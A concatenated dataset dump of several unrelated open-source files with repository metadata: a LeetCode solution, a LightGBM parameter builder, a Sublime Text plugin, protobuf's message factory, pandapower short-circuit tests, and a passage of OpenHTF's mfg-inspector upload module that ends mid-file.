2021-06-30T00:39:26.000Z
|
2021-08-01T07:13:59.000Z
|
python/35.search-insert-position.py
|
Zhenye-Na/leetcode
|
95196a45f5709ccf7b970ee5ac84a4bf8fe2301e
|
[
"MIT"
] | 6
|
2020-02-08T02:55:22.000Z
|
2022-01-02T22:48:18.000Z
|
#
# @lc app=leetcode id=35 lang=python3
#
# [35] Search Insert Position
#
# https://leetcode.com/problems/search-insert-position/description/
#
# algorithms
# Easy (42.78%)
# Likes: 3231
# Dislikes: 284
# Total Accepted: 777K
# Total Submissions: 1.8M
# Testcase Example: '[1,3,5,6]\n5'
#
# Given a sorted array of distinct integers and a target value, return the
# index if the target is found. If not, return the index where it would be if
# it were inserted in order.
#
#
# Example 1:
# Input: nums = [1,3,5,6], target = 5
# Output: 2
# Example 2:
# Input: nums = [1,3,5,6], target = 2
# Output: 1
# Example 3:
# Input: nums = [1,3,5,6], target = 7
# Output: 4
# Example 4:
# Input: nums = [1,3,5,6], target = 0
# Output: 0
# Example 5:
# Input: nums = [1], target = 0
# Output: 0
#
#
# Constraints:
#
#
# 1 <= nums.length <= 10^4
# -10^4 <= nums[i] <= 10^4
# nums contains distinct values sorted in ascending order.
# -10^4 <= target <= 10^4
#
#
#
# @lc code=start
from typing import List
class Solution:
def searchInsert(self, nums: List[int], target: int) -> int:
# the last number smaller than target, idx + 1
if not nums or len(nums) == 0:
return 0
start, end = 0, len(nums) - 1
while start + 1 < end:
mid = (start + end) // 2
if nums[mid] >= target:
end = mid
else:
start = mid
if nums[end] < target:
return end + 1
if nums[start] < target:
return start + 1
return 0
# @lc code=end
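# An equivalent answer can also be obtained with the standard library's bisect module;
# this is an illustrative alternative, not part of the submitted solution above.
from bisect import bisect_left
def search_insert_bisect(nums, target):
    # bisect_left returns the leftmost index at which target can be inserted
    # while keeping nums sorted, which is exactly the required position.
    return bisect_left(nums, target)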
| 20.72
| 77
| 0.564994
|
61765fc5080d3855bd0c8d2f5207f1f1adcd772e
| 715
|
py
|
Python
|
contentful_management/environment_assets_proxy.py
|
bram-rongen/contentful-management.py
|
dc94fa2ece08b56dd5a995511af1c64ca2e6bee5
|
[
"MIT"
] | 30
|
2017-04-13T20:58:22.000Z
|
2021-12-30T22:13:43.000Z
|
contentful_management/environment_assets_proxy.py
|
bram-rongen/contentful-management.py
|
dc94fa2ece08b56dd5a995511af1c64ca2e6bee5
|
[
"MIT"
] | 42
|
2017-04-15T02:10:48.000Z
|
2022-03-10T23:30:26.000Z
|
contentful_management/environment_assets_proxy.py
|
bram-rongen/contentful-management.py
|
dc94fa2ece08b56dd5a995511af1c64ca2e6bee5
|
[
"MIT"
] | 15
|
2017-06-02T12:57:48.000Z
|
2020-12-08T13:34:36.000Z
|
from .environment_resource_proxy import EnvironmentResourceProxy
from .assets_proxy import AssetsProxy
"""
contentful_management.environment_assets_proxy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module implements the EnvironmentAssetsProxy class.
API reference: https://www.contentful.com/developers/docs/references/content-management-api/#/reference/entries
:copyright: (c) 2018 by Contentful GmbH.
:license: MIT, see LICENSE for more details.
"""
class EnvironmentAssetsProxy(EnvironmentResourceProxy):
"""
API reference: https://www.contentful.com/developers/docs/references/content-management-api/#/reference/entries
"""
def _resource_proxy_class(self):
return AssetsProxy
| 28.6
| 115
| 0.746853
|
6f071f71fbca848516794867727c07f121b22a34
| 174
|
py
|
Python
|
.history/CourseLessions/FlowControlWithLoops/if_else_20210623204519.py
|
minefarmer/Complete-Coding-E-Degree
|
7044d32b155d0fb2520c3234a0a4e3b2b44fa84b
|
[
"Unlicense"
] | null | null | null |
.history/CourseLessions/FlowControlWithLoops/if_else_20210623204519.py
|
minefarmer/Complete-Coding-E-Degree
|
7044d32b155d0fb2520c3234a0a4e3b2b44fa84b
|
[
"Unlicense"
] | null | null | null |
.history/CourseLessions/FlowControlWithLoops/if_else_20210623204519.py
|
minefarmer/Complete-Coding-E-Degree
|
7044d32b155d0fb2520c3234a0a4e3b2b44fa84b
|
[
"Unlicense"
] | null | null | null |
"""[If/Else]
Focus of this section is on controlling the flow of my data and coding with loops
If and else statements are key and our introduction into logical programmin
"""
| 43.5
| 81
| 0.781609
|
7c424293381b95153ce99a43d55d339634767350
| 81
|
py
|
Python
|
Build_Web_With_Flask/Building web applications with Flask_Code/chapter10/chapter10/wsgi.py
|
abacuspix/NFV_project
|
f5585a6750119b1f954fea65c37a14badad1fd62
|
[
"MIT"
] | null | null | null |
Build_Web_With_Flask/Building web applications with Flask_Code/chapter10/chapter10/wsgi.py
|
abacuspix/NFV_project
|
f5585a6750119b1f954fea65c37a14badad1fd62
|
[
"MIT"
] | null | null | null |
Build_Web_With_Flask/Building web applications with Flask_Code/chapter10/chapter10/wsgi.py
|
abacuspix/NFV_project
|
f5585a6750119b1f954fea65c37a14badad1fd62
|
[
"MIT"
] | null | null | null |
# coding:utf-8
from main import app_factory
app = app_factory(name="myproject")
| 16.2
| 35
| 0.765432
|
61f11d891c8ee23952c3f7aaa6204d1da72b7420
| 5,695
|
py
|
Python
|
data_tools/lgbm/parameters.py
|
lopez86/DataTools
|
573419f3a40ddeb5e9eaf5ced8ea8dbf41c8a65e
|
[
"MIT"
] | null | null | null |
data_tools/lgbm/parameters.py
|
lopez86/DataTools
|
573419f3a40ddeb5e9eaf5ced8ea8dbf41c8a65e
|
[
"MIT"
] | null | null | null |
data_tools/lgbm/parameters.py
|
lopez86/DataTools
|
573419f3a40ddeb5e9eaf5ced8ea8dbf41c8a65e
|
[
"MIT"
] | null | null | null |
from enum import Enum
from typing import List
import funcy
class Task(Enum):
TRAIN = 'train'
PREDICT = 'predict'
CONVERT_MODEL = 'convert_model'
REFIT = 'refit'
class Objective(Enum):
REGRESSION = 'regression'
REGRESSION_L1 = 'regression_l1'
HUBER = 'huber'
FAIR = 'fair'
POISSON = 'poisson'
QUANTILE = 'quantile'
MAPE = 'mape'
    GAMMA = 'gamma'
TWEEDIE = 'tweedie'
BINARY = 'binary'
MULTICLASS = 'multiclass'
MULTICLASSOVA = 'multiclassova'
XENTROPY = 'xentropy'
XENTLAMBDA = 'xentlambda'
LAMBDARANK = 'lambdarank'
class Boosting(Enum):
GBDT = 'gbdt'
RF = 'rf'
DART = 'dart'
GOSS = 'goss'
class TreeLearner(Enum):
SERIAL = 'serial'
FEATURE = 'feature'
DATA = 'data'
VOTING = 'voting'
class DeviceType(Enum):
CPU = 'cpu'
GPU = 'gpu'
class Metric(Enum):
DEFAULT = ''
NONE = 'None'
MAE = 'mae'
MSE = 'mse'
RMSE = 'rmse'
QUANTILE = 'quantile'
MAPE = 'mape'
HUBER = 'huber'
POISSON = 'poisson'
GAMMA = 'gamma'
GAMMA_DEVIANCE = 'gamma_deviance'
TWEEDIE = 'tweedie'
NDCG = 'ndcg'
MAP = 'map'
AUC = 'auc'
BINARY_LOGLOSS = 'binary_logloss'
BINARY_ERROR = 'binary_error'
MULTI_LOGLOSS = 'multi_logloss'
MULTI_ERROR = 'multi_error'
KLDIV = 'kldiv'
class LGBMParameterBuilder:
def __init__(self):
self._params = {}
def set_config(self, config: str):
self._params['config'] = config
return self
def set_task(self, task: Task):
self._params['task'] = task.value
return self
def set_objective(self, objective: Objective):
self._params['objective'] = objective.value
return self
def set_boosting(self, value: Boosting):
self._params['boosting'] = value.value
return self
def set_learning_rate(self, value: float):
self._params['learning_rate'] = value
return self
def set_num_leaves(self, value: int):
self._params['num_leaves'] = value
return self
def set_tree_learner(self, value: TreeLearner):
        self._params['tree_learner'] = value.value
return self
def set_num_threads(self, value: int):
self._params['num_threads'] = value
return self
def set_device_type(self, value: DeviceType):
self._params['device_type'] = value.value
return self
def set_seed(self, value: int):
self._params['seed'] = value
return self
def set_max_depth(self, value: int):
self._params['max_depth'] = value
return self
def set_min_data_in_leaf(self, value: int):
self._params['min_data_in_leaf'] = value
return self
def set_min_sum_hessian_in_leaf(self, value: float):
self._params['min_sum_hessian_in_leaf'] = value
return self
def set_bagging_fraction(self, value: float):
self._params['bagging_fraction'] = value
return self
def set_bagging_freq(self, value: int):
self._params['bagging_freq'] = value
return self
def set_bagging_seed(self, value: int):
self._params['bagging_seed'] = value
return self
def set_feature_fraction(self, value: float):
self._params['feature_fraction'] = value
return self
def set_feature_fraction_seed(self, value: int):
self._params['feature_fraction_seed'] = value
return self
def set_early_stopping_round(self, value: int):
self._params['early_stopping_round'] = value
return self
def set_max_delta_step(self, value: float):
self._params['max_delta_step'] = value
return self
def set_lambda_l1(self, value: float):
self._params['lambda_l1'] = value
return self
def set_lambda_l2(self, value: float):
self._params['lambda_l2'] = value
return self
def set_min_gain_to_split(self, value: float):
self._params['min_gain_to_split'] = value
return self
def set_verbosity(self, value: int):
self._params['verbosity'] = value
return self
def set_num_class(self, value: int):
self._params['num_class'] = value
return self
def set_is_unbalance(self, value: bool):
if value is True and 'scale_pos_weight' in self._params:
raise ParameterError(
'is_unbalance and scale_pos_weight cannot both be used.'
)
self._params['is_unbalance'] = value
return self
def set_scale_pos_weight(self, value: float):
if self._params.get('is_unbalance', False) is True:
raise ParameterError(
'is_unbalance and scale_pos_weight cannot both be used.'
)
self._params['scale_pos_weight'] = value
return self
def add_metric(self, value: Metric):
        self._params['metric'] = funcy.ldistinct(
            self._params.get('metric', []) + [value.value]
        )
return self
def add_metrics(self, values: List[Metric]):
self._params['metric'] = funcy.ldistinct(
self._params.get('metric', []) + [v.value for v in values]
)
return self
def set_is_provide_training_metric(self, value: bool):
self._params['is_provide_training_metric'] = value
return self
def construct(self) -> dict:
return self._params
class ParameterError(Exception):
pass
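# Illustrative usage sketch (a hypothetical helper, not part of the original module):
# the setter methods chain, and construct() returns a plain dict that can be passed to
# LightGBM as its params argument.
def _example_binary_params() -> dict:
    return (
        LGBMParameterBuilder()
        .set_objective(Objective.BINARY)
        .set_boosting(Boosting.GBDT)
        .set_learning_rate(0.05)
        .set_num_leaves(31)
        .add_metrics([Metric.AUC, Metric.BINARY_LOGLOSS])
        .construct()
    )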
| 26.365741
| 73
| 0.597015
|
5f3212a40f92cc292c273e407525e8c4fd9683a5
| 2,315
|
py
|
Python
|
Packages/Tag/tag_close_tag.py
|
262877348/Data
|
46e7ea20929ecb0496edd72efd0d2a599f0e49d9
|
[
"Apache-2.0"
] | null | null | null |
Packages/Tag/tag_close_tag.py
|
262877348/Data
|
46e7ea20929ecb0496edd72efd0d2a599f0e49d9
|
[
"Apache-2.0"
] | null | null | null |
Packages/Tag/tag_close_tag.py
|
262877348/Data
|
46e7ea20929ecb0496edd72efd0d2a599f0e49d9
|
[
"Apache-2.0"
] | null | null | null |
import sublime, sublime_plugin
from Tag import Tag
Tag = Tag.Tag()
class TagCloseTagCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
is_xml = Tag.view_is_xml(view);
closed_some_tag = False
new_selections = []
new_selections_insert = []
for region in view.sel():
cursorPosition = region.begin()
tag = self.close_tag(view.substr(sublime.Region(0, cursorPosition)), is_xml)
if tag and tag != '</':
if region.empty():
replace = False
view.insert(edit, cursorPosition, tag);
else:
replace = True
view.replace(edit, sublime.Region(region.begin(), region.end()), '');
view.insert(edit, cursorPosition, tag);
if tag != '</':
closed_some_tag = True
if replace:
new_selections_insert.append(sublime.Region(region.begin()+len(tag), region.begin()+len(tag)))
else:
new_selections_insert.append(sublime.Region(region.end()+len(tag), region.end()+len(tag)))
else:
new_selections.append(sublime.Region(region.end()+len(tag), region.end()+len(tag)))
else:
new_selections.append(sublime.Region(region.end(), region.end()))
view.sel().clear()
# we inserted the "</tagname" part.
# running the command "insert" with parameter ">" to allow
# to the application indent these tags correctly
if closed_some_tag:
view.run_command('hide_auto_complete')
for sel in new_selections_insert:
view.sel().add(sel)
view.run_command('insert', {"characters": ">"})
view.run_command('reindent', {"force_indent": True})
for sel in new_selections:
view.sel().add(sel)
def close_tag(self, data, is_xml):
data = Tag.clean_html(data).split('<')
data.reverse()
try:
i = 0
lenght = len(data)-1
while i < lenght:
tag = Tag.name(data[i], True, is_xml)
# if opening tag, close the tag
if tag:
if not Tag.is_closing(data[i]):
return '</'+Tag.name(data[i], True, is_xml)+''
# if closing tag, jump to opening tag
else:
i = i+1
skip = 0
while i < lenght:
if Tag.name(data[i], True, is_xml) == tag:
if not Tag.is_closing(data[i]):
if skip == 0:
break
else:
skip = skip-1
else:
skip = skip+1
i = i+1
i = i+1
return ''
except:
return '';
| 26.609195
| 100
| 0.62635
|
4770ae156a6d91406dfda4e71cf6e8bf48f2a5cf
| 7,667
|
py
|
Python
|
Website/FlaskWebsite/env/Lib/site-packages/google/protobuf/message_factory.py
|
amirpaia/election-campaign-dynamics
|
b2b32c627cb79c7eb60e458511210308b7ff4035
|
[
"CC0-1.0"
] | 6
|
2022-02-04T18:12:24.000Z
|
2022-03-21T23:57:12.000Z
|
Website/FlaskWebsite/env/Lib/site-packages/google/protobuf/message_factory.py
|
amirpaia/election-campaign-dynamics
|
b2b32c627cb79c7eb60e458511210308b7ff4035
|
[
"CC0-1.0"
] | null | null | null |
Website/FlaskWebsite/env/Lib/site-packages/google/protobuf/message_factory.py
|
amirpaia/election-campaign-dynamics
|
b2b32c627cb79c7eb60e458511210308b7ff4035
|
[
"CC0-1.0"
] | 1
|
2022-02-08T03:53:23.000Z
|
2022-02-08T03:53:23.000Z
|
# Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Provides a factory class for generating dynamic messages.
The easiest way to use this class is if you have access to the FileDescriptor
protos containing the messages you want to create you can just do the following:
message_classes = message_factory.GetMessages(iterable_of_file_descriptors)
my_proto_instance = message_classes['some.proto.package.MessageName']()
"""
__author__ = 'matthewtoia@google.com (Matt Toia)'
from google.protobuf.internal import api_implementation
from google.protobuf import descriptor_pool
from google.protobuf import message
if api_implementation.Type() == 'cpp':
from google.protobuf.pyext import cpp_message as message_impl
else:
from google.protobuf.internal import python_message as message_impl
# The type of all Message classes.
_GENERATED_PROTOCOL_MESSAGE_TYPE = message_impl.GeneratedProtocolMessageType
class MessageFactory(object):
"""Factory for creating Proto2 messages from descriptors in a pool."""
def __init__(self, pool=None):
"""Initializes a new factory."""
self.pool = pool or descriptor_pool.DescriptorPool()
# local cache of all classes built from protobuf descriptors
self._classes = {}
def GetPrototype(self, descriptor):
"""Obtains a proto2 message class based on the passed in descriptor.
Passing a descriptor with a fully qualified name matching a previous
invocation will cause the same class to be returned.
Args:
descriptor: The descriptor to build from.
Returns:
A class describing the passed in descriptor.
"""
if descriptor not in self._classes:
result_class = self.CreatePrototype(descriptor)
# The assignment to _classes is redundant for the base implementation, but
# might avoid confusion in cases where CreatePrototype gets overridden and
# does not call the base implementation.
self._classes[descriptor] = result_class
return result_class
return self._classes[descriptor]
def CreatePrototype(self, descriptor):
"""Builds a proto2 message class based on the passed in descriptor.
Don't call this function directly, it always creates a new class. Call
    GetPrototype() instead. This method is meant to be overridden in subclasses
to perform additional operations on the newly constructed class.
Args:
descriptor: The descriptor to build from.
Returns:
A class describing the passed in descriptor.
"""
descriptor_name = descriptor.name
result_class = _GENERATED_PROTOCOL_MESSAGE_TYPE(
descriptor_name,
(message.Message,),
{
'DESCRIPTOR': descriptor,
# If module not set, it wrongly points to message_factory module.
'__module__': None,
})
result_class._FACTORY = self # pylint: disable=protected-access
# Assign in _classes before doing recursive calls to avoid infinite
# recursion.
self._classes[descriptor] = result_class
for field in descriptor.fields:
if field.message_type:
self.GetPrototype(field.message_type)
for extension in result_class.DESCRIPTOR.extensions:
if extension.containing_type not in self._classes:
self.GetPrototype(extension.containing_type)
extended_class = self._classes[extension.containing_type]
extended_class.RegisterExtension(extension)
return result_class
def GetMessages(self, files):
"""Gets all the messages from a specified file.
This will find and resolve dependencies, failing if the descriptor
pool cannot satisfy them.
Args:
files: The file names to extract messages from.
Returns:
A dictionary mapping proto names to the message classes. This will include
any dependent messages as well as any messages defined in the same file as
a specified message.
"""
result = {}
for file_name in files:
file_desc = self.pool.FindFileByName(file_name)
for desc in file_desc.message_types_by_name.values():
result[desc.full_name] = self.GetPrototype(desc)
# While the extension FieldDescriptors are created by the descriptor pool,
# the python classes created in the factory need them to be registered
# explicitly, which is done below.
#
# The call to RegisterExtension will specifically check if the
# extension was already registered on the object and either
# ignore the registration if the original was the same, or raise
# an error if they were different.
for extension in file_desc.extensions_by_name.values():
if extension.containing_type not in self._classes:
self.GetPrototype(extension.containing_type)
extended_class = self._classes[extension.containing_type]
extended_class.RegisterExtension(extension)
return result
_FACTORY = MessageFactory()
def GetMessages(file_protos):
"""Builds a dictionary of all the messages available in a set of files.
Args:
file_protos: Iterable of FileDescriptorProto to build messages out of.
Returns:
A dictionary mapping proto names to the message classes. This will include
any dependent messages as well as any messages defined in the same file as
a specified message.
"""
# The cpp implementation of the protocol buffer library requires to add the
# message in topological order of the dependency graph.
file_by_name = {file_proto.name: file_proto for file_proto in file_protos}
def _AddFile(file_proto):
for dependency in file_proto.dependency:
if dependency in file_by_name:
# Remove from elements to be visited, in order to cut cycles.
_AddFile(file_by_name.pop(dependency))
_FACTORY.pool.Add(file_proto)
while file_by_name:
_AddFile(file_by_name.popitem()[1])
return _FACTORY.GetMessages([file_proto.name for file_proto in file_protos])
| 41.22043
| 81
| 0.728838
|
8a939c5fe7714a6d900c86707ffc88e14b3ba43e
| 3,394
|
py
|
Python
|
pandapower/test/shortcircuit/test_sgen.py
|
gdgarcia/pandapower
|
630e3278ca012535f78282ae73f1b86f3fe932fc
|
[
"BSD-3-Clause"
] | null | null | null |
pandapower/test/shortcircuit/test_sgen.py
|
gdgarcia/pandapower
|
630e3278ca012535f78282ae73f1b86f3fe932fc
|
[
"BSD-3-Clause"
] | 1
|
2019-04-17T14:58:53.000Z
|
2019-04-17T14:58:53.000Z
|
pandapower/test/shortcircuit/test_sgen.py
|
gdgarcia/pandapower
|
630e3278ca012535f78282ae73f1b86f3fe932fc
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2016-2020 by University of Kassel and Fraunhofer Institute for Energy Economics
# and Energy System Technology (IEE), Kassel. All rights reserved.
import numpy as np
import pytest
import pandapower as pp
import pandapower.shortcircuit as sc
@pytest.fixture
def wind_park_example():
net = pp.create_empty_network()
b1 = pp.create_bus(net, vn_kv=110., index=1)
b2 = pp.create_bus(net, vn_kv=110., index=2)
b3 = pp.create_bus(net, vn_kv=110., index=3)
b4 = pp.create_bus(net, vn_kv=110., index=4)
pp.create_ext_grid(net, b1, s_sc_max_mva=20*110*np.sqrt(3), rx_max=0.1)
pp.create_line_from_parameters(net, from_bus=b1, to_bus=b2, length_km=100, r_ohm_per_km=0.120, x_ohm_per_km=0.393, c_nf_per_km=0, max_i_ka=10)
pp.create_line_from_parameters(net, from_bus=b1, to_bus=b3, length_km=50, r_ohm_per_km=0.120, x_ohm_per_km=0.393, c_nf_per_km=0, max_i_ka=10)
pp.create_line_from_parameters(net, from_bus=b2, to_bus=b3, length_km=50, r_ohm_per_km=0.120, x_ohm_per_km=0.393, c_nf_per_km=0, max_i_ka=10)
pp.create_line_from_parameters(net, from_bus=b3, to_bus=b4, length_km=25, r_ohm_per_km=0.120, x_ohm_per_km=0.393, c_nf_per_km=0, max_i_ka=10)
pp.create_sgen(net, b2, p_mw=0.1e3, sn_mva=100)
pp.create_sgen(net, b3, p_mw=0.050e3, sn_mva=50)
pp.create_sgen(net, b4, p_mw=0.050e3, sn_mva=50)
net.sgen["k"] = 1.2
return net
@pytest.fixture
def three_bus_example():
net = pp.create_empty_network()
b1 = pp.create_bus(net, 110)
b2 = pp.create_bus(net, 110)
b3 = pp.create_bus(net, 110)
pp.create_ext_grid(net, b1, s_sc_max_mva=100., s_sc_min_mva=80., rx_min=0.4, rx_max=0.4)
pp.create_line(net, b1, b2, std_type="305-AL1/39-ST1A 110.0" , length_km=20.)
pp.create_line(net, b2, b3, std_type="N2XS(FL)2Y 1x185 RM/35 64/110 kV" , length_km=15.)
net.line["endtemp_degree"] = 80
pp.create_sgen(net, b2, sn_mva=2, p_mw=0, k=1.2)
return net
def test_max_branch_results(three_bus_example):
net = three_bus_example
sc.calc_sc(net, case="max", ip=True, ith=True, branch_results=True)
assert np.allclose(net.res_bus_sc.ikss_ka.values, np.array([0.53746061, 0.50852707, 0.4988896]))
assert np.allclose(net.res_line_sc.ikss_ka.values, np.array([ 0.49593034, 0.4988896 ]))
assert np.allclose(net.res_line_sc.ip_ka.values, np.array([ 0.92787443, 0.9251165 ]))
assert np.allclose(net.res_line_sc.ith_ka.values, np.array([ 0.49811957, 0.50106881]))
def test_min_branch_results(three_bus_example):
net = three_bus_example
sc.calc_sc(net, case="min", ip=True, ith=True, branch_results=True)
assert np.allclose(net.res_bus_sc.ikss_ka.values, np.array([ 0.43248784, 0.41156533, 0.40431286]))
assert np.allclose(net.res_line_sc.ikss_ka.values, np.array([ 0.39171613, 0.40431286]))
assert np.allclose(net.res_line_sc.ip_ka.values, np.array([ 0.72795118, 0.74576565]))
assert np.allclose(net.res_line_sc.ith_ka.values, np.array([ 0.39340278, 0.40605375]))
def test_wind_park(wind_park_example):
net = wind_park_example
sc.calc_sc(net, ip=True)
assert np.isclose(net.res_bus_sc.ikss_ka.at[2], 3.9034, rtol=1e-4)
assert np.isclose(net.res_bus_sc.ip_ka.at[2], 7.3746, rtol=1e-4)
if __name__ == '__main__':
pytest.main(["test_sgen.py"])
| 47.802817
| 147
| 0.705657
|
900785961d6f5c92943fb1722a74c1c6acedf535
| 13,838
|
py
|
Python
|
openhtf/output/callbacks/mfg_inspector.py
|
prateekspanning/openhtf
|
831f0e3947a56c2b63665886659df2c14de926df
|
[
"Apache-2.0"
] | 372
|
2015-09-02T00:08:40.000Z
|
2022-03-30T17:29:30.000Z
|
openhtf/output/callbacks/mfg_inspector.py
|
prateekspanning/openhtf
|
831f0e3947a56c2b63665886659df2c14de926df
|
[
"Apache-2.0"
] | 772
|
2015-09-01T22:00:20.000Z
|
2022-02-10T14:53:14.000Z
|
openhtf/output/callbacks/mfg_inspector.py
|
prateekspanning/openhtf
|
831f0e3947a56c2b63665886659df2c14de926df
|
[
"Apache-2.0"
] | 204
|
2015-09-01T20:48:21.000Z
|
2022-03-13T22:20:50.000Z
|
"""Output and/or upload a TestRun or MfgEvent proto for mfg-inspector.com.
"""
import copy
import json
import logging
import threading
import time
from typing import Any, Dict
import zlib
import httplib2
import oauth2client.client
from openhtf import util
from openhtf.core import test_record
from openhtf.output import callbacks
from openhtf.output.proto import guzzle_pb2
from openhtf.output.proto import mfg_event_pb2
from openhtf.output.proto import test_runs_converter
import six
from six.moves import range
class UploadFailedError(Exception):
"""Raised when an upload to mfg-inspector fails."""
class InvalidTestRunError(Exception):
"""Raised if test run is invalid."""
def _send_mfg_inspector_request(envelope_data, credentials, destination_url):
"""Send upload http request. Intended to be run in retry loop."""
logging.info('Uploading result...')
http = httplib2.Http()
if credentials.access_token_expired:
credentials.refresh(http)
credentials.authorize(http)
resp, content = http.request(destination_url, 'POST', envelope_data)
try:
result = json.loads(content)
except Exception:
logging.warning('Upload failed with response %s: %s', resp, content)
raise UploadFailedError(resp, content)
if resp.status == 200:
return result
message = '%s: %s' % (result.get('error',
'UNKNOWN_ERROR'), result.get('message'))
if resp.status == 400:
raise InvalidTestRunError(message)
else:
raise UploadFailedError(message)
def send_mfg_inspector_data(inspector_proto, credentials, destination_url,
payload_type):
"""Upload MfgEvent to steam_engine."""
envelope = guzzle_pb2.TestRunEnvelope()
envelope.payload = zlib.compress(inspector_proto.SerializeToString())
envelope.payload_type = payload_type
envelope_data = envelope.SerializeToString()
for _ in range(5):
try:
result = _send_mfg_inspector_request(envelope_data, credentials,
destination_url)
return result
except UploadFailedError:
time.sleep(1)
logging.critical(
'Could not upload to mfg-inspector after 5 attempts. Giving up.')
return {}
class _MemStorage(oauth2client.client.Storage):
"""Helper Storage class that keeps credentials in memory."""
def __init__(self):
self._lock = threading.Lock()
self._credentials = None
def acquire_lock(self):
self._lock.acquire(True)
def release_lock(self):
self._lock.release()
def locked_get(self):
return self._credentials
def locked_put(self, credentials):
self._credentials = credentials
class MfgInspector(object):
"""Interface to convert a TestRun to a mfg-inspector compatible proto.
Instances of this class are typically used to create callbacks that are
compatible with the OpenHTF output callbacks.
Typical usage:
interface = mfg_inspector.MfgInspector.from_json().set_converter(
my_custom_converter)
my_tester.add_output_callbacks(interface.save_to_disk(), interface.upload())
  **Important** the conversion of the TestRecord to protobuf as specified in
the _converter callable attribute only occurs once and the resulting protobuf
is cached in memory on the instance.
The upload callback will upload to mfg-inspector.com using the given
username and authentication key (which should be the key data itself, not a
filename or file).
  In typical production setups, we *first* save the protobuf to disk then attempt
to upload the protobuf to mfg-inspector. In the event of a network outage,
the result of the test run is available on disk and a separate process can
retry the upload when network is available.
"""
TOKEN_URI = 'https://accounts.google.com/o/oauth2/token'
SCOPE_CODE_URI = 'https://www.googleapis.com/auth/glass.infra.quantum_upload'
DESTINATION_URL = ('https://clients2.google.com/factoryfactory/'
'uploads/quantum_upload/?json')
PARAMS = ['dut_id', 'end_time_millis', 'start_time_millis', 'station_id']
# These attributes control format of callback and what actions are undertaken
# when called. These should either be set by a subclass or via configure.
# _converter is a callable that can be set either via set_converter method
# or by defining a _converter @staticmethod on subclasses.
_converter = None
# A default filename pattern can be specified on subclasses for use when
# saving to disk via save_to_disk.
_default_filename_pattern = None
# Cached last partial upload of the run's MfgEvent.
_cached_partial_proto = None
# Partial proto fully uploaded.
_partial_proto_upload_complete = False
def __init__(self,
user=None,
keydata=None,
token_uri=TOKEN_URI,
destination_url=DESTINATION_URL):
self.user = user
self.keydata = keydata
self.token_uri = token_uri
self.destination_url = destination_url
if user and keydata:
self.credentials = oauth2client.client.SignedJwtAssertionCredentials(
service_account_name=self.user,
private_key=six.ensure_binary(self.keydata),
scope=self.SCOPE_CODE_URI,
user_agent='OpenHTF Guzzle Upload Client',
token_uri=self.token_uri)
self.credentials.set_store(_MemStorage())
else:
self.credentials = None
self.upload_result = None
self._cached_proto = None
self._cached_params = dict.fromkeys(self.PARAMS)
@classmethod
def from_json(cls, json_data):
"""Create an uploader given (parsed) JSON data.
Note that this is a JSON-formatted key file downloaded from Google when
the service account key is created, *NOT* a json-encoded
oauth2client.client.SignedJwtAssertionCredentials object.
Args:
json_data: Dict containing the loaded JSON key data.
Returns:
a MfgInspectorCallback with credentials.
"""
return cls(
user=json_data['client_email'],
keydata=json_data['private_key'],
token_uri=json_data['token_uri'])
def _check_cached_params(self, test_record_obj):
"""Check if all cached params equal the values in test record."""
for param in self.PARAMS:
if self._cached_params[param] != getattr(test_record_obj, param):
return False
return True
def _convert(self, test_record_obj):
"""Convert and cache a test record to a mfg-inspector proto."""
if (self._cached_proto is None or
not self._check_cached_params(test_record_obj)):
self._cached_proto = self._converter(test_record_obj)
for param in self.PARAMS:
self._cached_params[param] = getattr(test_record_obj, param)
return self._cached_proto
def _get_blobref_from_cache(self, attachment_name: str):
"""Gets the existing_blobref if attachment was already uploaded."""
if not self._cached_partial_proto:
return None
for attachment in self._cached_partial_proto.attachment:
if (attachment.name == attachment_name and
attachment.HasField('existing_blobref')):
return attachment.existing_blobref
def _get_blobref_from_reply(self, reply: Dict[str, Any],
attachment_name: str):
"""Gets the existing_blobref if attachment was already uploaded."""
for item in reply['extendedParameters']:
if (item['name'] == attachment_name and 'blobRef' in item):
return item['blobRef']
def _update_attachments_from_cache(self, proto: mfg_event_pb2.MfgEvent):
"""Replaces attachments binary values with blobrefs when applicable."""
for attachment in proto.attachment:
if attachment.HasField('value_binary'):
blobref = self._get_blobref_from_cache(attachment.name)
if blobref:
attachment.ClearField('value')
attachment.existing_blobref = blobref
def _update_attachments_from_reply(self, proto: mfg_event_pb2.MfgEvent):
"""Replaces attachments binary values with blorrefs when applicable."""
reply = json.loads(self.upload_result['lite_test_run'])
for attachment in proto.attachment:
if attachment.HasField('value_binary'):
literun_blobref = self._get_blobref_from_reply(reply, attachment.name)
if literun_blobref:
attachment.ClearField('value')
attachment.existing_blobref.blob_id = str.encode(
literun_blobref['BlobID'])
attachment.existing_blobref.size = int(literun_blobref['Size'])
def save_to_disk(self, filename_pattern=None):
